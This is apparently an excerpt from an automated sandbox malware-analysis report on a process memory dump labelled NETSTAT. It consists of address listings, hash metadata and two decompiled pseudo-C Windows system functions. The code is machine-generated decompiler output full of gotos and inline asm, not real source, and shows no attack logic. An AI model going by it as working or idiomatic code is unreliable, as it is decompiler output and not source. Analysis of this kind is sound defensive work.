                0x033828ec
                0x033828ef
                0x033828f5
                0x033828f8
                0x033828f8
                0x00000000
                0x033828f8
                0x00000000
                0x00000000
                0x03382866
                0x03382866
                0x03382876
                0x03382879
                0x00000000
                0x00000000
                0x033827e0
                0x033827e7
                0x033827e9
                0x033827eb
                0x033c5afd
                0x00000000
                0x033c5afd
                0x00000000
                0x00000000
                0x03382633
                0x03382638
                0x0338263b
                0x0338263c
                0x0338263e
                0x03382640
                0x03382642
                0x03382647
                0x03382649
                0x0338264e
                0x03382650
                0x03382653
                0x03382659
                0x033826a2
                0x033826a7
                0x033826ac
                0x033826b2
                0x033c5b11
                0x033c5b15
                0x033c5b17
                0x00000000
                0x033826b8
                0x033826b8
                0x033826ba
                0x033827a6
                0x033827a6
                0x033827a9
                0x033827ab
                0x033827b9
                0x033827b9
                0x033827be
                0x033827c1
                0x033827c3
                0x033827c5
                0x033827c7
                0x033c5c74
                0x033c5c79
                0x033c5c79
                0x033827c7
                0x00000000
                0x033826c0
                0x033826c0
                0x033826c3
                0x033826c6
                0x033826c6
                0x033826c9
                0x033826c9
                0x00000000
                0x033826c9
                0x033826ba
                0x0338265b
                0x0338265b
                0x0338265e
                0x03382667
                0x0338266d
                0x03382677
                0x0338267c
                0x0338267f
                0x03382681
                0x033c5b49
                0x033c5b4e
                0x033827cd
                0x033827d0
                0x033827d1
                0x033827d2
                0x033827d4
                0x033827dd
                0x03382687
                0x03382687
                0x0338268a
                0x0338268b
                0x0338268e
                0x0338268f
                0x03382691
                0x03382696
                0x03382698
                0x0338269d
                0x0338269f
                0x00000000
                0x0338269f
                0x03382681
                0x00000000
                0x00000000
                0x03382846
                0x00000000
                0x00000000
                0x03382605
                0x0338260a
                0x0338260c
                0x03382611
                0x03382616
                0x03382619
                0x03382619
                0x0338261e
                0x00000000
                0x03382624
                0x03382627
                0x03382627
                0x00000000
                0x00000000
                0x033c5b1f
                0x00000000
                0x00000000
                0x03382894
                0x0338289b
                0x0338289d
                0x033828a1
                0x033c5b2b
                0x033c5b2e
                0x033c5b2e
                0x033828a7
                0x033828a9
                0x033c5b04
                0x033c5b09
                0x033c5b09
                0x033c5b09
                0x00000000
                0x00000000
                0x033c5b35
                0x033c5b3c
                0x033828fb
                0x033828fb
                0x033826cc
                0x033826cc
                0x033826d0
                0x00000000
                0x033826d2
                0x033826d2
                0x00000000
                0x033826d2
                0x00000000
                0x00000000
                0x033825fe
                0x0338292d
                0x03382930
                0x03382935
                0x03382937
                0x03382939
                0x0338293e
                0x03382941
                0x03382946
                0x03382948
                0x0338294e
                0x0338294f
                0x03382951
                0x03382951
                0x03382952
                0x0338295a
                0x0338295c
                0x03382962
                0x03382963
                0x03382965
                0x03382966
                0x0338296b
                0x0338296e
                0x0338296f
                0x03382971
                0x03382974
                0x0338297b
                0x0338297d
                0x0338297e
                0x0338297f
                0x03382980
                0x03382981
                0x03382982
                0x03382983
                0x03382984
                0x03382985
                0x03382986
                0x03382987
                0x03382988
                0x03382989
                0x0338298a
                0x0338298b
                0x0338298c
                0x0338298d
                0x0338298e
                0x0338298f
                0x03382990
                0x03382992
                0x03382997
                0x033829a3
                0x033829a6
                0x033829ab
                0x033829ad
                0x033829b0
                0x033829b2
                0x033c5c80
                0x033829b8
                0x033829b8
                0x033829bb
                0x033829c0
                0x033829c5
                0x033829c6
                0x033829c6
                0x033829c9
                0x033829cb
                0x00000000
                0x00000000
                0x033829cd
                0x033829d0
                0x033829d9
                0x033829db
                0x033829dd
                0x03382a7f
                0x03382a84
                0x03382a87
                0x03382a89
                0x033c5ca1
                0x033c5ca3
                0x00000000
                0x03382a8f
                0x03382a8f
                0x00000000
                0x03382a8f
                0x00000000
                0x033829e3
                0x033829e3
                0x033829e3
                0x00000000
                0x033829e3
                0x033829dd
                0x00000000
                0x033829db
                0x033829e6
                0x033829e9
                0x033829eb
                0x033829ed
                0x033829f3
                0x033829f5
                0x033829f8
                0x033829fa
                0x03382a97
                0x03382a9a
                0x03382a9d
                0x03382add
                0x00000000
                0x03382a9f
                0x03382aa2
                0x03382aa5
                0x03382aa8
                0x03382aab
                0x033c5cab
                0x033c5caf
                0x033c5cc5
                0x033c5cda
                0x033c5cdc
                0x033c5cdf
                0x033c5ce5
                0x00000000
                0x033c5ceb
                0x033c5ced
                0x033c5cee
                0x00000000
                0x033c5cee
                0x033c5cb1
                0x033c5cb4
                0x033c5cb9
                0x033c5cbb
                0x00000000
                0x033c5cbd
                0x033c5cbd
                0x00000000
                0x033c5cbd
                0x033c5cbb
                0x03382ab1
                0x03382ab1
                0x03382ac4
                0x03382ac6
                0x03382ac6
                0x00000000
                0x03382ac6
                0x03382aab
                0x00000000
                0x03382a00
                0x03382a09
                0x03382a0e
                0x03382a21
                0x03382a24
                0x03382a35
                0x03382a3a
                0x03382a3d
                0x03382a42
                0x03382a59
                0x03382a59
                0x03382a5c
                0x03382a5f
                0x03382a5f
                0x033829fa
                0x033829f3
                0x03382a64
                0x03382a64
                0x03382a6b
                0x03382a6b
                0x03382a6d
                0x03382a72
                0x03382a72
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: PATH
                • API String ID: 0-1036084923
                • Opcode ID: 7cef2b26a999245840f66087157ebce7c2dec472d02383b69277b4fa544f82c0
                • Instruction ID: e9a01f7af1c62150ea5a0063244a9336c85c9775abaa98b0e38ee0a01128e566
                • Opcode Fuzzy Hash: 7cef2b26a999245840f66087157ebce7c2dec472d02383b69277b4fa544f82c0
                • Instruction Fuzzy Hash: 4FC16C79D10319EBDB24EF99D8C0AAEB7B5FF48700F584429F801EB250E775A941CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E0338FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0336EEF0(0x3447b60);
					_t134 =  *0x3447b84; // 0x77e07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3447b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3447b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03366D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E033676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E033F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0335B150();
													}
													_t116 = E033F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E033675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3448638; // 0x0
																	_t122 = L033638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E033676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E033676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0338FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L033670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0338FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0338FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0338FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0338FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0338FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3447b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3447b84 = _t75;
						_t73 = E0336EB70(_t134, 0x3447b60);
						if( *0x3447b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0336FF60( *0x3447b20);
							}
						}
						goto L5;
					}
				}
			}

















































                0x0338fab0
                0x0338fab2
                0x0338fab3
                0x0338fab4
                0x0338fabc
                0x0338fac0
                0x0338fb14
                0x0338fb17
                0x0338fac2
                0x0338fac8
                0x0338facd
                0x0338fad3
                0x0338fad3
                0x0338fadd
                0x0338fb18
                0x0338fb1b
                0x0338fb1d
                0x0338fb1e
                0x0338fb1f
                0x0338fb20
                0x0338fb21
                0x0338fb22
                0x0338fb23
                0x0338fb24
                0x0338fb25
                0x0338fb26
                0x0338fb27
                0x0338fb28
                0x0338fb29
                0x0338fb2a
                0x0338fb2b
                0x0338fb2c
                0x0338fb2d
                0x0338fb2e
                0x0338fb2f
                0x0338fb3a
                0x0338fb3b
                0x0338fb3e
                0x0338fb41
                0x0338fb44
                0x0338fb47
                0x0338fb4a
                0x0338fb4d
                0x0338fb53
                0x033cbdcb
                0x033cbdcb
                0x0338fb59
                0x0338fb5b
                0x0338fb5b
                0x0338fb5e
                0x033cbdd5
                0x033cbdd8
                0x00000000
                0x033cbdda
                0x00000000
                0x033cbdda
                0x0338fb64
                0x0338fb64
                0x0338fb64
                0x0338fb67
                0x0338fb6e
                0x0338fb70
                0x0338fb72
                0x00000000
                0x0338fb78
                0x0338fb7a
                0x0338fb7a
                0x0338fb7d
                0x0338fb80
                0x033cbddf
                0x033cbde1
                0x00000000
                0x033cbde3
                0x00000000
                0x033cbde3
                0x0338fb86
                0x0338fb86
                0x0338fb86
                0x0338fb8b
                0x0338fb90
                0x0338fb92
                0x0338fb94
                0x0338fb9a
                0x0338fb9b
                0x0338fba1
                0x033cbde8
                0x033cbdeb
                0x033cbded
                0x033cbeb5
                0x033cbeb5
                0x033cbebb
                0x033cbebd
                0x033cbec3
                0x033cbed2
                0x033cbedd
                0x033cbedd
                0x033cbeed
                0x00000000
                0x033cbdf3
                0x033cbdfe
                0x033cbe06
                0x033cbe0b
                0x033cbe0d
                0x033cbe0f
                0x033cbe14
                0x033cbe19
                0x033cbe20
                0x033cbe25
                0x033cbe27
                0x033cbe35
                0x033cbe39
                0x033cbe46
                0x033cbe4f
                0x033cbe54
                0x033cbe56
                0x033cbef8
                0x033cbef8
                0x00000000
                0x033cbe5c
                0x033cbe5c
                0x033cbe60
                0x00000000
                0x033cbe66
                0x033cbe66
                0x033cbe7f
                0x033cbe84
                0x033cbe87
                0x033cbe89
                0x033cbe8b
                0x033cbe99
                0x033cbe9d
                0x033cbea0
                0x033cbeac
                0x033cbeaf
                0x033cbeb1
                0x033cbeb3
                0x033cbeb3
                0x00000000
                0x033cbea2
                0x033cbea2
                0x00000000
                0x033cbea2
                0x033cbe8d
                0x033cbe8d
                0x033cbe92
                0x00000000
                0x033cbe92
                0x033cbe8b
                0x033cbe60
                0x033cbe3b
                0x033cbe3b
                0x033cbe3e
                0x00000000
                0x033cbe40
                0x033cbe40
                0x033cbe44
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033cbe44
                0x033cbe3e
                0x033cbe29
                0x033cbe29
                0x00000000
                0x033cbe29
                0x033cbe27
                0x00000000
                0x0338fba7
                0x0338fba7
                0x0338fbab
                0x033cbf02
                0x0338fbb1
                0x0338fbb1
                0x0338fbb8
                0x0338fbbd
                0x0338fbbd
                0x0338fbbf
                0x0338fbbf
                0x0338fbc5
                0x0338fbcb
                0x0338fbf8
                0x0338fbf8
                0x0338fbfa
                0x00000000
                0x0338fc00
                0x0338fc00
                0x0338fc03
                0x00000000
                0x0338fc09
                0x0338fc09
                0x0338fc0f
                0x0338fc15
                0x0338fc23
                0x0338fc23
                0x0338fc25
                0x0338fc27
                0x0338fc75
                0x0338fc7c
                0x0338fc84
                0x00000000
                0x0338fc29
                0x0338fc29
                0x0338fc2d
                0x0338fc30
                0x033cbf0f
                0x00000000
                0x0338fc36
                0x0338fc38
                0x0338fc3b
                0x0338fc41
                0x033cbf17
                0x033cbf19
                0x033cbf48
                0x033cbf4b
                0x00000000
                0x033cbf1b
                0x033cbf22
                0x033cbf24
                0x033cbf26
                0x00000000
                0x033cbf2c
                0x033cbf37
                0x033cbf39
                0x033cbf3b
                0x00000000
                0x033cbf41
                0x033cbf41
                0x033cbf41
                0x033cbf41
                0x033cbf45
                0x00000000
                0x033cbf45
                0x033cbf3b
                0x033cbf26
                0x00000000
                0x0338fc47
                0x0338fc47
                0x0338fc49
                0x0338fcb2
                0x0338fcb4
                0x0338fcb6
                0x0338fcdc
                0x0338fcdc
                0x00000000
                0x0338fcb8
                0x0338fcc3
                0x0338fcc5
                0x0338fcc7
                0x00000000
                0x0338fcc9
                0x0338fcc9
                0x0338fccd
                0x00000000
                0x0338fccd
                0x0338fcc7
                0x00000000
                0x0338fc4b
                0x0338fc4b
                0x0338fc4e
                0x0338fc4e
                0x0338fc51
                0x0338fc51
                0x0338fc54
                0x0338fc5a
                0x0338fc5c
                0x0338fc5f
                0x0338fc61
                0x0338fc63
                0x0338fc65
                0x0338fc67
                0x0338fc6e
                0x0338fc72
                0x0338fc72
                0x0338fc72
                0x0338fc72
                0x0338fc67
                0x0338fc61
                0x00000000
                0x0338fc5a
                0x0338fc49
                0x0338fc41
                0x0338fc30
                0x0338fc27
                0x0338fc03
                0x0338fbcd
                0x0338fbd3
                0x0338fbd9
                0x0338fbdc
                0x0338fbde
                0x0338fc99
                0x0338fc9b
                0x0338fc9d
                0x0338fcd5
                0x0338fcd5
                0x0338fc89
                0x0338fc89
                0x00000000
                0x0338fc9f
                0x0338fc9f
                0x0338fca3
                0x00000000
                0x0338fca3
                0x00000000
                0x0338fbe4
                0x0338fbe4
                0x0338fbe4
                0x0338fbe4
                0x0338fbe9
                0x0338fbf2
                0x00000000
                0x0338fbf2
                0x0338fbde
                0x0338fbcb
                0x0338fbab
                0x0338fc8b
                0x0338fc8b
                0x0338fc8c
                0x0338fb80
                0x0338fb72
                0x0338fb5e
                0x0338fc8d
                0x0338fc91
                0x0338fadf
                0x0338fadf
                0x0338fae1
                0x0338fae4
                0x0338fae7
                0x0338faec
                0x0338faf8
                0x0338fb00
                0x0338fb07
                0x0338fb0f
                0x0338fb0f
                0x0338fb07
                0x00000000
                0x0338faf8
                0x0338fadd

                Strings
                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 033CBE0F
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                • API String ID: 0-865735534
                • Opcode ID: be92b0d78f4e461bdfdd136fd5dad532d0ad349d395c6003a7e677eda7ed0238
                • Instruction ID: 32e21c1bdba4dac2cfc9faf1a2fa5a0dd80113a315004850da4a2a8081b4a0d5
                • Opcode Fuzzy Hash: be92b0d78f4e461bdfdd136fd5dad532d0ad349d395c6003a7e677eda7ed0238
                • Instruction Fuzzy Hash: 37A10075B10B468FDB25EF68D8D0B6AF7B8AF48724F08456DE902DB690DB30D941CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03352D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                Download Yara Rule
                C-Code - Quality: 63%
                			E03352D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3445350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3447bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E033997C0();
				}
				if( *0x34479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x34479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03381624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03377D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E033EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03399520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0338E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L033ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3446901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3446901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03399980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E033995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03377D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03377D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E033D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E033EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3445350;
							if(_t109 != 0x3445350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E033EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E033E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                0x03352d8a
                0x03352d8a
                0x03352d92
                0x03352d96
                0x03352d9e
                0x03352da0
                0x03352da3
                0x03352da5
                0x03352da8
                0x03352dab
                0x03352db2
                0x033af9aa
                0x033af9ab
                0x033af9ae
                0x033af9ae
                0x03352db8
                0x03352dc2
                0x033af9b9
                0x033af9be
                0x033af9bf
                0x033af9bf
                0x03352dcf
                0x033af9c9
                0x03352dd5
                0x03352dd5
                0x03352dd5
                0x03352dde
                0x03352de1
                0x03352e70
                0x03352e72
                0x03352e72
                0x03352de7
                0x03352deb
                0x03352e7c
                0x03352e83
                0x03352e85
                0x03352e8b
                0x03352e8d
                0x03352e92
                0x03352e92
                0x03352e85
                0x03352df1
                0x03352df7
                0x03352df9
                0x03352df9
                0x03352dfc
                0x03352dff
                0x03352e02
                0x00000000
                0x03352e05
                0x03352e0c
                0x033af9d9
                0x03352e12
                0x03352e12
                0x03352e12
                0x03352e1a
                0x033af9e3
                0x033af9e9
                0x033af9f0
                0x033af9f6
                0x033af9f8
                0x033af9f8
                0x033af9f0
                0x03352e23
                0x033afa02
                0x033afa03
                0x033afa05
                0x033afa06
                0x00000000
                0x03352e29
                0x03352e29
                0x03352e2e
                0x03352e34
                0x03352e3e
                0x00000000
                0x00000000
                0x03352e44
                0x03352e47
                0x03352e4d
                0x00000000
                0x00000000
                0x03352e4f
                0x03352e54
                0x00000000
                0x00000000
                0x03352e5a
                0x03352e5f
                0x03352e9a
                0x03352ea4
                0x03352ea5
                0x03352ea8
                0x03352eaf
                0x03352eb2
                0x03352eb5
